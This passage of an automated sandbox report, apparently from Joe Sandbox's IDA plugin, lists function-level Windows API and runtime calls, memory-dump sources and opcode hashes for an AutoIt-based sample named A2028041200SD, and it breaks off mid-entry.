                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CounterPerformanceQuerySleep
                                                                        • String ID:
                                                                        • API String ID: 2875609808-0
                                                                        • Opcode ID: 36ee716112e732f10b4d5acbef9314e9e1bf822834df7b2b85ff145ea3780ae6
                                                                        • Instruction ID: ec656ffd3e9dc9483db0c6447617c4d015869976cefaa58270fd20602c470714
                                                                        • Opcode Fuzzy Hash: 36ee716112e732f10b4d5acbef9314e9e1bf822834df7b2b85ff145ea3780ae6
                                                                        • Instruction Fuzzy Hash: BF118E31E0561DDBDF049FA4D949BEEBB38FF49711F414045EA41B2280CB30A6A0DF91
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                        • Instruction ID: a5a6fbf4b9adcb6d2abf294b06c9e5a5b61ae005f197894f098a088d1f335760
                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                        • Instruction Fuzzy Hash: A101493204015EBBDF125F84EC05CEE3F27BB58350B5A8455FE2859039D336CAB2AB81
                                                                        APIs
                                                                          • Part of subcall function 00917A0D: __getptd_noexit.LIBCMT ref: 00917A0E
                                                                        • __lock.LIBCMT ref: 0091748F
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 009174AC
                                                                        • _free.LIBCMT ref: 009174BF
                                                                        • InterlockedIncrement.KERNEL32(01021660), ref: 009174D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                        • String ID:
                                                                        • API String ID: 2704283638-0
                                                                        • Opcode ID: a02e7b97f406233256e859f23b218e93b9bd3e5282b9949094d3c82f506d8982
                                                                        • Instruction ID: eaecd5b95644fd1fc99fb91445e78add167318dc326b9e3ee87a46c3c7297f0b
                                                                        • Opcode Fuzzy Hash: a02e7b97f406233256e859f23b218e93b9bd3e5282b9949094d3c82f506d8982
                                                                        • Instruction Fuzzy Hash: F801A132B0A61AA7DB22AFE598057DDFB75BF45710F144005F464676E0CB2459C0DFC2
                                                                        APIs
                                                                        • __lock.LIBCMT ref: 00917AD8
                                                                          • Part of subcall function 00917CF4: __mtinitlocknum.LIBCMT ref: 00917D06
                                                                          • Part of subcall function 00917CF4: EnterCriticalSection.KERNEL32(00000000,?,00917ADD,0000000D), ref: 00917D1F
                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00917AE5
                                                                        • __lock.LIBCMT ref: 00917AF9
                                                                        • ___addlocaleref.LIBCMT ref: 00917B17
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 1687444384-0
                                                                        • Opcode ID: e4abafc784883c662376b51423a053d77e61f9dbe30ae8d17aed837627c93414
                                                                        • Instruction ID: 22fa37a95f007b276039479b2feb5c500481b93b42fa1ced17051528f92ede54
                                                                        • Opcode Fuzzy Hash: e4abafc784883c662376b51423a053d77e61f9dbe30ae8d17aed837627c93414
                                                                        • Instruction Fuzzy Hash: C1016D72648B05DFE731DFB5D90578AF7F0AF84325F20890EA49A972A0CB70A680CB51
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0095E33D
                                                                        • _memset.LIBCMT ref: 0095E34C
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009B3D00,009B3D44), ref: 0095E37B
                                                                        • CloseHandle.KERNEL32 ref: 0095E38D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 3277943733-0
                                                                        • Opcode ID: 888a3e4c565d366fffdbd2c19536c92faa91cafb7032469c57802627b414a7c5
                                                                        • Instruction ID: e691776ee5efddcaff3538b9a3e6a8acd03ddd27f32e0e959a940b68fe73dbce
                                                                        • Opcode Fuzzy Hash: 888a3e4c565d366fffdbd2c19536c92faa91cafb7032469c57802627b414a7c5
                                                                        • Instruction Fuzzy Hash: 45F089F16543047EE3109B61AD55FB77EACDB44B64F008521FE08D61E2D3765E4097A4
                                                                        APIs
                                                                          • Part of subcall function 0090AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0090AFE3
                                                                          • Part of subcall function 0090AF83: SelectObject.GDI32(?,00000000), ref: 0090AFF2
                                                                          • Part of subcall function 0090AF83: BeginPath.GDI32(?), ref: 0090B009
                                                                          • Part of subcall function 0090AF83: SelectObject.GDI32(?,00000000), ref: 0090B033
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0095EA8E
                                                                        • LineTo.GDI32(00000000,?,?), ref: 0095EA9B
                                                                        • EndPath.GDI32(00000000), ref: 0095EAAB
                                                                        • StrokePath.GDI32(00000000), ref: 0095EAB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                        • String ID:
                                                                        • API String ID: 1539411459-0
                                                                        • Opcode ID: 2f72620d96d1441ed252d961e4f239714d03b6ec81e6cd955a7b20a67a5118ee
                                                                        • Instruction ID: 1888bae64ca28338cc76a4ac23701f5043f4da365212c66231915465f423f197
                                                                        • Opcode Fuzzy Hash: 2f72620d96d1441ed252d961e4f239714d03b6ec81e6cd955a7b20a67a5118ee
                                                                        • Instruction Fuzzy Hash: C9F0E23301A259BBDB12AFA4AD0DFCE3F29AF06321F044201FE05600E183755691EBD5
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0092C84A
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0092C85D
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0092C864
                                                                        • AttachThreadInput.USER32(00000000), ref: 0092C86B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 2710830443-0
                                                                        • Opcode ID: c6c11f1eff79867bf441ac21160507e0882ecd4f4058245d5cdc2521dec78cc6
                                                                        • Instruction ID: 9b7568c84ee96c1c4f9c9eb0a355175e29f6eebab73716ee6c1dfc562c0a7098
                                                                        • Opcode Fuzzy Hash: c6c11f1eff79867bf441ac21160507e0882ecd4f4058245d5cdc2521dec78cc6
                                                                        • Instruction Fuzzy Hash: 6DE0E57254622476DB105B61EC0DEDB7F6CEF157A1F408025B50D95450C675D5C1D7E0
                                                                        APIs
                                                                        • GetCurrentThread.KERNEL32 ref: 0092B0D6
                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,0092AC9D), ref: 0092B0DD
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0092AC9D), ref: 0092B0EA
                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,0092AC9D), ref: 0092B0F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                        • String ID:
                                                                        • API String ID: 3974789173-0
                                                                        • Opcode ID: bfc16379d7c2965f0d4c5ed248d9c288d3d905fd91d9d528699c0e1d6521bc24
                                                                        • Instruction ID: 52b86793fca5bb3d1f03dbaac6367872a317e2b80ca7af6643862ac5bb14d3f8
                                                                        • Opcode Fuzzy Hash: bfc16379d7c2965f0d4c5ed248d9c288d3d905fd91d9d528699c0e1d6521bc24
                                                                        • Instruction Fuzzy Hash: CEE086336562219BD7201FB16C0CB573BFCEF55795F018818F345D6044DB348481D760
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 0090B496
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0090B4A0
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0090B4B5
                                                                        • GetStockObject.GDI32(00000005), ref: 0090B4BD
                                                                        • GetWindowDC.USER32(?,00000000), ref: 0096DE2B
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0096DE38
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0096DE51
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0096DE6A
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0096DE8A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0096DE95
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1946975507-0
                                                                        • Opcode ID: cc2738535433de76f3615065bfe230ed04df993427e883769ed3de5322a7d255
                                                                        • Instruction ID: 6b65549521c86c3aa65603c7134b81c39832f533649a0c4df8ba250371b0fc2c
                                                                        • Opcode Fuzzy Hash: cc2738535433de76f3615065bfe230ed04df993427e883769ed3de5322a7d255
                                                                        • Instruction Fuzzy Hash: 6AE06D32619240AFEB212B74AC09BD83B25AF52339F04C226FA7A580E1C3724980EB11
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: abb8a432adf147fdb2b5a7a7fc5268027914928985b791686e894eed265e09bf
                                                                        • Instruction ID: 971938340bad98ab44aaf0c12dcbf11806dbf8b1faf56ea05243472dcaf9e04b
                                                                        • Opcode Fuzzy Hash: abb8a432adf147fdb2b5a7a7fc5268027914928985b791686e894eed265e09bf
                                                                        • Instruction Fuzzy Hash: 19E01AB2115204EFDB005F70C848A2D7BB4EF4C350F118805F85E87250DB789880AB40
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092B2DF
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 0092B2EB
                                                                        • CloseHandle.KERNEL32(?), ref: 0092B2F4
                                                                        • CloseHandle.KERNEL32(?), ref: 0092B2FC
                                                                          • Part of subcall function 0092AB24: GetProcessHeap.KERNEL32(00000000,?,0092A848), ref: 0092AB2B
                                                                          • Part of subcall function 0092AB24: HeapFree.KERNEL32(00000000), ref: 0092AB32
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        • Opcode ID: ff1cb1e7a86b6d0a14636af38a3a749a4e209942c575a960c2a735b8dab00092
                                                                        • Instruction ID: aef4c31fa16c7333c60f83b8f5a33d944242af873f9ca907224b9b91e86133dc
                                                                        • Opcode Fuzzy Hash: ff1cb1e7a86b6d0a14636af38a3a749a4e209942c575a960c2a735b8dab00092
                                                                        • Instruction Fuzzy Hash: E1E0B63B119005BBCB012BA5EC0885DFBB6FF883213108221F62981575CB32A8B1FB91
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: 4e3ff6e0fbfd4fb94afbb4c74b5ad641b07ee17838235a9e6793438669d7a55b
                                                                        • Instruction ID: a388fc8ba866c5716ac1b8d76c61f6c30272651a69253d889851a6beb90e8059
                                                                        • Opcode Fuzzy Hash: 4e3ff6e0fbfd4fb94afbb4c74b5ad641b07ee17838235a9e6793438669d7a55b
                                                                        • Instruction Fuzzy Hash: 13E046B2515200EFDB005F70C84CA2DBBB8FF4C350F118809F95E8B250CB79A880AB40
                                                                        APIs
                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0092DEAA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ContainedObject
                                                                        • String ID: AutoIt3GUI$Container
                                                                        • API String ID: 3565006973-3941886329
                                                                        • Opcode ID: 3a4822e8e6049a01c32580dc2cce5f0e74b2adeb7272d840ef41bed1914d118b
                                                                        • Instruction ID: 9df1881ddff6d8ea5f5e83138d48ee66e5cb200c572fa8b828b2a291ab48b846
                                                                        • Opcode Fuzzy Hash: 3a4822e8e6049a01c32580dc2cce5f0e74b2adeb7272d840ef41bed1914d118b
                                                                        • Instruction Fuzzy Hash: 6D914770601711AFDB24CF64D884B6AB7F9BF89710F20886DF94ACB695DB70E941CB60
                                                                        APIs
                                                                          • Part of subcall function 0090C6F4: _wcscpy.LIBCMT ref: 0090C717
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • __wcsnicmp.LIBCMT ref: 0093DEFD
                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0093DFC6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                        • String ID: LPT
                                                                        • API String ID: 3222508074-1350329615
                                                                        • Opcode ID: 8e88168e481d06309880e6e964cf29bd968214eead770d9939a87b941d9c28d3
                                                                        • Instruction ID: 0d125a04839234d4b76870dc773f5e3366b709ce42bbc05bad68db0926969069
                                                                        • Opcode Fuzzy Hash: 8e88168e481d06309880e6e964cf29bd968214eead770d9939a87b941d9c28d3
                                                                        • Instruction Fuzzy Hash: BC617C75A04219AFCB18DF98C891EAEB7B9FF48710F014069F546AB391DB74AE40CF91
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 0090BCDA
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 0090BCF3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        • Opcode ID: 493b0cd84c1d3e1ad670c1bbe8867fb2d9b62d1f293524b73674d81e6dd8086e
                                                                        • Instruction ID: 2419fdb60b712e01b25cc880d52c8016814685f27692a90a1c81d98c41b93ae2
                                                                        • Opcode Fuzzy Hash: 493b0cd84c1d3e1ad670c1bbe8867fb2d9b62d1f293524b73674d81e6dd8086e
                                                                        • Instruction Fuzzy Hash: 8D5133724187449BE320AF14DC8ABAFBBE8FFD5354F41484EF1C8410A2EB7085AC8792
                                                                        APIs
                                                                          • Part of subcall function 008F44ED: __fread_nolock.LIBCMT ref: 008F450B
                                                                        • _wcscmp.LIBCMT ref: 0093C65D
                                                                        • _wcscmp.LIBCMT ref: 0093C670
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$__fread_nolock
                                                                        • String ID: FILE
                                                                        • API String ID: 4029003684-3121273764
                                                                        • Opcode ID: 46f826ef14cf8edc51dd4ce2aa7a99d1b420848b9eeed8ea7036920685ab9618
                                                                        • Instruction ID: ab6a29c53c2090f843e5c86de1426ca608a8ae4cb08c5e956a2a56e9837a252c
                                                                        • Opcode Fuzzy Hash: 46f826ef14cf8edc51dd4ce2aa7a99d1b420848b9eeed8ea7036920685ab9618
                                                                        • Instruction Fuzzy Hash: 3C41D572A0020ABBDF20ABB4DC42FEF77B9EF89714F00546AF605FB181D6719A448B51
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0095A85A
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0095A86F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        • Opcode ID: e016a2139a55d386669740b9f994e3347ba3bc35fd91b13a6604da0d71cf91a1
                                                                        • Instruction ID: 67758c4192e413e611221c73e94dfb38fd116397c2097ea64919e5a6ea55f750
